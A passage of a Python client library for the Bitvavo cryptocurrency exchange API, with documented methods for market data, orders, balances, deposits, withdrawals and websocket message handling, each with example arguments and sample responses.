* https://api.bitvavo.com/v2/BTC-EUR/candles?interval=1h&limit=100
---
Args:
```python
market="BTC-EUR"
interval="1h" # Choose: 1m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d
# use `int(time.time() * 1000)` to get current timestamp in milliseconds
# or `int(datetime.datetime.now().timestamp()*1000)`
options={
"limit": [ 1 .. 1440 ], default 1440
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8640000000000000
}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
[
# For whatever reason, you're getting a list of lists; no keys,
# so here is the explanation of what's what.
# timestamp, open, high, low, close, volume
[1640815200000, "41648", "41859", "41519", "41790", "12.1926685"],
[1640811600000, "41771", "41780", "41462", "41650", "13.90917427"],
[1640808000000, "41539", "42083", "41485", "41771", "14.39770267"],
[1640804400000, "41937", "41955", "41449", "41540", "23.64498292"],
[1640800800000, "41955", "42163", "41807", "41939", "10.40093845"],
]
```
"""
options["interval"] = interval
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/{market}/candles{postfix}")
def tickerPrice(self, options: strdict) -> Union[List[strdict], strdict]:
"""Get the current price for each market
---
Examples:
* https://api.bitvavo.com/v2/ticker/price
* https://api.bitvavo.com/v2/ticker/price?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/price?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/price?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/price?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/price?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
# Note that `price` is unconverted
[
{"market": "1INCH-EUR", "price": "2.1594"},
{"market": "AAVE-EUR", "price": "214.42"},
{"market": "ADA-BTC", "price": "0.000021401"},
{"market": "ADA-EUR", "price": "1.2011"},
{"market": "ADX-EUR", "price": "0.50357"},
{"market": "AE-BTC", "price": "0.0000031334"},
{"market": "AE-EUR", "price": "0.064378"},
{"market": "AION-BTC", "price": "0.000004433"},
{"market": "AION-EUR", "price": "0.1258"},
{"market": "AKRO-EUR", "price": "0.020562"},
{"market": "ALGO-EUR", "price": "1.3942"},
# and another 210 markets below this point
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/ticker/price{postfix}")
def tickerBook(self, options: strdict) -> Union[List[strdict], strdict]:
"""Get current bid/ask, bidsize/asksize per market
---
Examples:
* https://api.bitvavo.com/v2/ticker/book
* https://api.bitvavo.com/v2/ticker/book?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/book?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/book?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/book?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/book?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
[
{"market": "1INCH-EUR", "bid": "2.1534", "ask": "2.1587", "bidSize": "194.8", "askSize": "194.8"},
{"market": "AAVE-EUR", "bid": "213.7", "ask": "214.05", "bidSize": "212.532", "askSize": "4.77676965"},
{"market": "ADA-EUR", "bid": "1.2", "ask": "1.2014", "bidSize": "415.627597", "askSize": "600"},
{"market": "ADX-EUR", "bid": "0.49896", "ask": "0.50076", "bidSize": "1262.38216882", "askSize": "700.1"},
{"market": "AION-EUR", "bid": "0.12531", "ask": "0.12578", "bidSize": "3345", "askSize": "10958.49228653"},
# and another 215 markets below this point
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/ticker/book{postfix}")
def ticker24h(self, options: strdict) -> Union[List[anydict], anydict, errordict]:
"""Get current bid/ask, bidsize/asksize per market
---
Examples:
* https://api.bitvavo.com/v2/ticker/24h
* https://api.bitvavo.com/v2/ticker/24h?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
```
---
Rate Limit Weight:
```python
25 # if no market option is used
1 # if a market option is used
```
---
Returns:
```python
[
{
"market": "1INCH-EUR",
"open": "2.2722",
"high": "2.2967",
"low": "2.1258",
"last": "2.1552",
"volume": "92921.3792573",
"volumeQuote": "204118.95",
"bid": "2.1481",
"bidSize": "392.46514457",
"ask": "2.1513",
"askSize": "195.3",
"timestamp": 1640819573777
},
{
"market": "AAVE-EUR",
"open": "224.91",
"high": "228.89",
"low": "210.78",
"last": "213.83",
"volume": "5970.52391148",
"volumeQuote": "1307777.47",
"bid": "213.41",
"bidSize": "2.61115011",
"ask": "213.85",
"askSize": "1.864",
"timestamp": 1640819573285
},
# and then 219 more markets
]
```
"""
rateLimitingWeight = 25
if "market" in options:
rateLimitingWeight = 1
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/ticker/24h{postfix}", rateLimitingWeight)
def placeOrder(self, market: str, side: str, orderType: str, body: anydict) -> anydict:
"""Place a new order on the exchange
---
Args:
```python
market="SHIB-EUR"
side="buy" # Choose: buy, sell
# For market orders either `amount` or `amountQuote` is required
orderType="market" # Choose: market, limit, stopLoss, stopLossLimit, takeProfit, takeProfitLimit
body={
"amount": "1.567",
"amountQuote": "5000",
# GTC orders will remain on the order book until they are filled or canceled.
# IOC orders will fill against existing orders, but will cancel any remaining amount after that.
            # FOK orders will either fill completely against existing orders, or will be canceled (if the entire order cannot be filled).
"timeInForce": "GTC", # Choose: GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
# 'decrementAndCancel' decrements both orders by the amount that would have been filled, which in turn cancels the smallest of the two orders.
# 'cancelOldest' will cancel the entire older order and places the new order.
# 'cancelNewest' will cancel the order that is submitted.
# 'cancelBoth' will cancel both the current and the old order.
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"disableMarketProtection": false,
"responseRequired": true # setting this to `false` will return only an 'acknowledged', and be faster
}
# For limit orders `amount` and `price` are required.
orderType="limit" # Choose: market, limit, stopLoss, stopLossLimit, takeProfit, takeProfitLimit
body={
"amount": "1.567",
"price": "6000",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": True
}
orderType="stopLoss"
# or
orderType="takeProfit"
body={
"amount": "1.567",
"amountQuote": "5000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"disableMarketProtection": false,
"responseRequired": true
}
orderType="stopLossLimit"
# or
orderType="takeProfitLimit"
body={
"amount": "1.567",
"price": "6000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": true
}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": false,
"disableMarketProtection": true
}
```
"""
body["market"] = market
body["side"] = side
body["orderType"] = orderType
return self.privateRequest("/order", "", body, "POST")
def updateOrder(self, market: str, orderId: str, body: anydict) -> anydict:
"""Update an existing order for a specific market. Make sure that at least one of the optional parameters is set,
otherwise nothing will be updated.
---
Args:
```python
market="BTC-EUR"
orderId="95d92d6c-ecf0-4960-a608-9953ef71652e"
body={
"amount": "1.567",
"amountRemaining": "1.567",
"price": "6000",
"triggerAmount": "4000", # only for stop orders
# GTC orders will remain on the order book until they are filled or canceled.
# IOC orders will fill against existing orders, but will cancel any remaining amount after that.
            # FOK orders will either fill completely against existing orders, or will be canceled (if the entire order cannot be filled).
"timeInForce": "GTC", # Choose: GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
# 'decrementAndCancel' decrements both orders by the amount that would have been filled, which in turn cancels the smallest of the two orders.
# 'cancelOldest' will cancel the entire older order and places the new order.
# 'cancelNewest' will cancel the order that is submitted.
# 'cancelBoth' will cancel both the current and the old order.
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": true # setting this to `false` will return only an 'acknowledged', and be faster
}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
```
"""
body["market"] = market
body["orderId"] = orderId
return self.privateRequest("/order", "", body, "PUT")
def cancelOrder(self, market: str, orderId: str) -> strdict:
"""Cancel an existing order for a specific market
---
Args:
```python
market="BTC-EUR"
orderId="a4a5d310-687c-486e-a3eb-1df832405ccd"
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{"orderId": "2e7ce7fc-44e2-4d80-a4a7-d079c4750b61"}
```
"""
postfix = createPostfix({"market": market, "orderId": orderId})
return self.privateRequest("/order", postfix, {}, "DELETE")
def getOrder(self, market: str, orderId: str) -> Union[List[anydict], errordict]:
"""Get an existing order for a specific market
---
Args:
```python
market="BTC-EUR"
orderId="ff403e21-e270-4584-bc9e-9c4b18461465"
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
```
"""
postfix = createPostfix({"market": market, "orderId": orderId})
return self.privateRequest("/order", postfix, {}, "GET")
def getOrders(self, market: str, options: anydict) -> Union[List[anydict], errordict]:
"""Get multiple existing orders for a specific market
---
Args:
```python
market="BTC-EUR"
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
# A whole list of these
[
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
]
```
"""
options["market"] = market
postfix = createPostfix(options)
return self.privateRequest("/orders", postfix, {}, "GET", 5)
def cancelOrders(self, options: anydict) -> Union[List[strdict], errordict]:
"""Cancel all existing orders for a specific market (or account)
---
Args:
```python
options={} # WARNING - WILL REMOVE ALL OPEN ORDERS ON YOUR ACCOUNT!
options={"market":"BTC-EUR"} # Removes all open orders for this market
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
# A whole list of these
[
{"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6"}
]
```
"""
postfix = createPostfix(options)
return self.privateRequest("/orders", postfix, {}, "DELETE")
def ordersOpen(self, options: anydict) -> Union[List[anydict], errordict]:
"""Get all open orders, either for all markets, or a single market
---
Args:
```python
options={} # Gets all open orders for all markets
options={"market":"BTC-EUR"} # Get open orders for this market
```
---
Rate Limit Weight:
```python
25 # if no market option is used
1 # if a market option is used
```
---
Returns:
```python
[
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
]
```
"""
rateLimitingWeight = 25
if "market" in options:
rateLimitingWeight = 1
postfix = createPostfix(options)
return self.privateRequest("/ordersOpen", postfix, {}, "GET", rateLimitingWeight)
def trades(self, market: str, options: anydict) -> Union[List[anydict], errordict]:
"""Get all historic trades from this account
---
Args:
```python
market="BTC-EUR"
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"id": "108c3633-0276-4480-a902-17a01829deae",
"orderId": "1d671998-3d44-4df4-965f-0d48bd129a1b",
"timestamp": 1542967486256,
"market": "BTC-EUR",
"side": "buy",
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
]
```
"""
options["market"] = market
postfix = createPostfix(options)
return self.privateRequest("/trades", postfix, {}, "GET", 5)
def account(self) -> Dict[str, strdict]:
"""Get all fees for this account
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"fees": {
"taker": "0.0025",
"maker": "0.0015",
"volume": "10000.00"
}
}
```
"""
return self.privateRequest("/account", "", {}, "GET")
def balance(self, options: strdict) -> Union[List[strdict], errordict]:
"""Get the balance for this account
---
Args:
```python
options={} # return all balances
options={symbol="BTC"} # return a single balance
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"symbol": "BTC",
"available": "1.57593193",
"inOrder": "0.74832374"
}
]
```
"""
postfix = createPostfix(options)
return self.privateRequest("/balance", postfix, {}, "GET", 5)
def depositAssets(self, symbol: str) -> strdict:
"""Get the deposit address (with paymentId for some assets) or bank account information to increase your balance
---
Args:
```python
symbol="BTC"
symbol="SHIB"
symbol="EUR"
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"address": "CryptoCurrencyAddress",
"paymentId": "10002653"
}
# or
{
"iban": "NL32BUNQ2291234129",
"bic": "BUNQNL2A",
"description": "254D20CC94"
}
```
"""
postfix = createPostfix({"symbol": symbol})
return self.privateRequest("/deposit", postfix, {}, "GET")
def depositHistory(self, options: anydict) -> Union[List[anydict], errordict]:
"""Get the deposit history of the account
Even when you want something from a single `symbol`, you'll still receive a list with multiple deposits.
---
Args:
```python
options={
"symbol":"EUR"
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "0.99994",
"address": "BitcoinAddress",
"paymentId": "10002653",
"txId": "927b3ea50c5bb52c6854152d305dfa1e27fc01d10464cf10825d96d69d235eb3",
"fee": "0"
}
]
# or
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "500",
"address": "NL32BITV0001234567",
"fee": "0"
}
]
```
"""
postfix = createPostfix(options)
return self.privateRequest("/depositHistory", postfix, {}, "GET", 5)
def withdrawAssets(self, symbol: str, amount: str, address: str, body: anydict) -> anydict:
"""Withdraw a coin/token to an external crypto address or bank account.
---
Args:
```python
symbol="SHIB"
        amount="10"
        address="BitcoinAddress"  # Wallet address or IBAN
        body={
"paymentId": "10002653", # For digital assets only. Should be set when withdrawing straight to another exchange or merchants that require payment id's.
"internal": false, # For digital assets only. Should be set to true if the withdrawal must be sent to another Bitvavo user internally
"addWithdrawalFee": false # If set to true, the fee will be added on top of the requested amount, otherwise the fee is part of the requested amount and subtracted from the withdrawal.
}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"success": true,
"symbol": "BTC",
"amount": "1.5"
}
```
"""
body["symbol"] = symbol
body["amount"] = amount
body["address"] = address
return self.privateRequest("/withdrawal", "", body, "POST")
def withdrawalHistory(self, options: anydict) -> Union[List[anydict], anydict]:
"""Get the withdrawal history
---
Args:
```python
options={
"symbol":"SHIB"
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "0.99994",
"address": "BitcoinAddress",
"paymentId": "10002653",
"txId": "927b3ea50c5bb52c6854152d305dfa1e27fc01d10464cf10825d96d69d235eb3",
"fee": "0.00006",
"status": "awaiting_processing"
}
        ]
```
"""
postfix = createPostfix(options)
return self.privateRequest("/withdrawalHistory", postfix, {}, "GET", 5)
def newWebsocket(self) -> "Bitvavo.WebSocketAppFacade":
return Bitvavo.WebSocketAppFacade(self.APIKEY, self.APISECRET, self.ACCESSWINDOW, self.wsUrl, self)
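    # A hedged usage sketch of the websocket facade (the callbacks reuse the module-level
    # examples defined above):
    #   bitvavo = Bitvavo({"APIKEY": "...", "APISECRET": "..."})
    #   ws = bitvavo.newWebsocket()
    #   ws.setErrorCallback(error_callback_example)
    #   ws.time(callback_example)  # the server time dict is delivered to the callback
    #   ws.closeSocket()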
class WebSocketAppFacade:
"""
I gave this 'websocket' class a better name: WebSocketAppFacade.
It's a facade for the WebSocketApp class, with its own implementation for the on_* methods
"""
def __init__(self, APIKEY: str, APISECRET: str, ACCESSWINDOW: int, WSURL: str, bitvavo: "Bitvavo"):
self.APIKEY = APIKEY
self.APISECRET = APISECRET
self.ACCESSWINDOW = ACCESSWINDOW
self.WSURL = WSURL
self.open = False
self.callbacks: anydict = {}
self.keepAlive = True
self.reconnect = False
self.reconnectTimer: s_f = 0.1
self.bitvavo = bitvavo
self.subscribe()
def subscribe(self) -> None:
ws_lib.enableTrace(False)
self.ws = WebSocketApp(
self.WSURL,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
on_open=self.on_open,
)
self.receiveThread = ReceiveThread(self.ws, self)
self.receiveThread.daemon = True
self.receiveThread.start()
self.authenticated = False
self.keepBookCopy = False
self.localBook: anydict = {}
def closeSocket(self) -> None:
self.ws.close()
self.keepAlive = False
self.receiveThread.join()
def waitForSocket(self, ws: WebSocketApp, message: str, private: bool) -> None:
while True:
if (not private and self.open) or (private and self.authenticated and self.open):
return
time.sleep(0.1)
def doSend(self, ws: WebSocketApp, message: str, private: bool = False) -> None:
# TODO(NostraDavid) add nap-time to the websocket, or do it here; I don't know yet.
if private and self.APIKEY == "":
logger.error("no-apikey", tip="set the API key to be able to make private API calls")
return
self.waitForSocket(ws, message, private)
ws.send(message)
if self.bitvavo.debugging:
logger.debug("message-sent", message=message)
def on_message(self, ws, msg: str) -> None: # noqa: C901 (too-complex)
if self.bitvavo.debugging:
logger.debug("message-received", message=msg)
msg_dict: anydict = json.loads(msg)
callbacks = self.callbacks
if "error" in msg_dict:
if msg_dict["errorCode"] == 105:
self.bitvavo.updateRateLimit(msg_dict)
if "error" in callbacks:
callbacks["error"](msg_dict)
else:
logger.error(msg_dict)
if "action" in msg_dict:
if msg_dict["action"] == "getTime":
callbacks["time"](msg_dict["response"])
elif msg_dict["action"] == "getMarkets":
callbacks["markets"](msg_dict["response"])
elif msg_dict["action"] == "getAssets":
callbacks["assets"](msg_dict["response"])
elif msg_dict["action"] == "getTrades":
callbacks["publicTrades"](msg_dict["response"])
elif msg_dict["action"] == "getCandles":
callbacks["candles"](msg_dict["response"])
elif msg_dict["action"] == "getTicker24h":
callbacks["ticker24h"](msg_dict["response"])
elif msg_dict["action"] == "getTickerPrice":
callbacks["tickerPrice"](msg_dict["response"])
elif msg_dict["action"] == "getTickerBook":
callbacks["tickerBook"](msg_dict["response"])
elif msg_dict["action"] == "privateCreateOrder":
callbacks["placeOrder"](msg_dict["response"])
elif msg_dict["action"] == "privateUpdateOrder":
callbacks["updateOrder"](msg_dict["response"])
elif msg_dict["action"] == "privateGetOrder":
callbacks["getOrder"](msg_dict["response"])
elif msg_dict["action"] == "privateCancelOrder":
callbacks["cancelOrder"](msg_dict["response"])
elif msg_dict["action"] == "privateGetOrders":
callbacks["getOrders"](msg_dict["response"])
elif msg_dict["action"] == "privateGetOrdersOpen":
callbacks["ordersOpen"](msg_dict["response"])
elif msg_dict["action"] == "privateGetTrades":
callbacks["trades"](msg_dict["response"])
elif msg_dict["action"] == "privateGetAccount":
callbacks["account"](msg_dict["response"])
elif msg_dict["action"] == "privateGetBalance":
callbacks["balance"](msg_dict["response"])
elif msg_dict["action"] == "privateDepositAssets":
callbacks["depositAssets"](msg_dict["response"])
elif msg_dict["action"] == "privateWithdrawAssets":
callbacks["withdrawAssets"](msg_dict["response"])
elif msg_dict["action"] == "privateGetDepositHistory":
callbacks["depositHistory"](msg_dict["response"])
elif msg_dict["action"] == "privateGetWithdrawalHistory":
callbacks["withdrawalHistory"](msg_dict["response"])
elif msg_dict["action"] == "privateCancelOrders":
callbacks["cancelOrders"](msg_dict["response"])
elif msg_dict["action"] == "getBook":
market = msg_dict["response"]["market"]
if "book" in callbacks:
callbacks["book"](msg_dict["response"])
if self.keepBookCopy:
if market in callbacks["subscriptionBook"]:
callbacks["subscriptionBook"][market](self, msg_dict)
elif "event" in msg_dict:
if msg_dict["event"] == "authenticate":
self.authenticated = True
elif msg_dict["event"] == "fill":
market = msg_dict["market"]
callbacks["subscriptionAccount"][market](msg_dict)
elif msg_dict["event"] == "order":
market = msg_dict["market"]
callbacks["subscriptionAccount"][market](msg_dict)
elif msg_dict["event"] == "ticker":
market = msg_dict["market"]
callbacks["subscriptionTicker"][market](msg_dict)
elif msg_dict["event"] == "ticker24h":
for entry in msg_dict["data"]:
callbacks["subscriptionTicker24h"][entry["market"]](entry)
elif msg_dict["event"] == "candle":
market = msg_dict["market"]
interval = msg_dict["interval"]
callbacks["subscriptionCandles"][market][interval](msg_dict)
elif msg_dict["event"] == "book":
market = msg_dict["market"]
if "subscriptionBookUpdate" in callbacks:
if market in callbacks["subscriptionBookUpdate"]:
callbacks["subscriptionBookUpdate"][market](msg_dict)
if self.keepBookCopy:
if market in callbacks["subscriptionBook"]:
callbacks["subscriptionBook"][market](self, msg_dict)
elif msg_dict["event"] == "trade":
market = msg_dict["market"]
if "subscriptionTrades" in callbacks:
callbacks["subscriptionTrades"][market](msg_dict)
def on_error(self, ws, error: Any) -> None:
if "error" in self.callbacks:
self.callbacks["error"](error)
else:
logger.error(error)
def on_close(self, ws) -> None:
self.receiveThread.stop()
if self.bitvavo.debugging:
logger.debug("websocket-closed")
def checkReconnect(self) -> None: # noqa: C901 (too-complex)
if "subscriptionTicker" in self.callbacks:
for market in self.callbacks["subscriptionTicker"]:
self.subscriptionTicker(market, self.callbacks["subscriptionTicker"][market])
if "subscriptionTicker24h" in self.callbacks:
for market in self.callbacks["subscriptionTicker24h"]:
                    self.subscriptionTicker24h(market, self.callbacks["subscriptionTicker24h"][market])
if "subscriptionAccount" in self.callbacks:
for market in self.callbacks["subscriptionAccount"]:
self.subscriptionAccount(market, self.callbacks["subscriptionAccount"][market])
if "subscriptionCandles" in self.callbacks:
for market in self.callbacks["subscriptionCandles"]:
for interval in self.callbacks["subscriptionCandles"][market]:
self.subscriptionCandles(
market,
interval,
self.callbacks["subscriptionCandles"][market][interval],
)
if "subscriptionTrades" in self.callbacks:
for market in self.callbacks["subscriptionTrades"]:
self.subscriptionTrades(market, self.callbacks["subscriptionTrades"][market])
if "subscriptionBookUpdate" in self.callbacks:
for market in self.callbacks["subscriptionBookUpdate"]:
self.subscriptionBookUpdate(market, self.callbacks["subscriptionBookUpdate"][market])
if "subscriptionBookUser" in self.callbacks:
for market in self.callbacks["subscriptionBookUser"]:
self.subscriptionBook(market, self.callbacks["subscriptionBookUser"][market])
def on_open(self, ws) -> None:
now = time_ms() + BITVAVO_API_UPGRADED.LAG
self.open = True
self.reconnectTimer = 0.5
if self.APIKEY != "":
self.doSend(
self.ws,
json.dumps(
{
"window": str(self.ACCESSWINDOW),
"action": "authenticate",
"key": self.APIKEY,
"signature": createSignature(now, "GET", "/websocket", {}, self.APISECRET),
"timestamp": now,
},
),
)
if self.reconnect:
if self.bitvavo.debugging:
logger.debug("reconnecting")
thread = Thread(target=self.checkReconnect)
thread.start()
def setErrorCallback(self, callback: Callable[[Any], None]) -> None:
self.callbacks["error"] = callback
def time(self, callback: Callable[[Any], None]) -> None:
"""Get server-time, in milliseconds, since 1970-01-01
---
Non-websocket examples:
* https://api.bitvavo.com/v2/time
---
Args:
```python
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{"time": 1539180275424 }
```
"""
self.callbacks["time"] = callback
self.doSend(self.ws, json.dumps({"action": "getTime"}))
def markets(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get all available markets with some meta-information, unless options is given a `market` key.
Then you will get a single market, instead of a list of markets.
---
Examples:
* https://api.bitvavo.com/v2/markets
* https://api.bitvavo.com/v2/markets?market=BTC-EUR
* https://api.bitvavo.com/v2/markets?market=SHIB-EUR
---
Args:
```python
# Choose one:
options={} # returns all markets
options={"market": "BTC-EUR"} # returns only the BTC-EUR market
# If you want multiple markets, but not all, make multiple calls
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
[
{
"market": "BTC-EUR",
"status": "trading",
"base": "BTC",
"quote": "EUR",
"pricePrecision": "5",
"minOrderInQuoteAsset": "10",
"minOrderInBaseAsset": "0.001",
"orderTypes": [
"market",
"limit",
"stopLoss",
"stopLossLimit",
"takeProfit",
"takeProfitLimit"
]
}
]
```
"""
self.callbacks["markets"] = callback
options["action"] = "getMarkets"
self.doSend(self.ws, json.dumps(options))
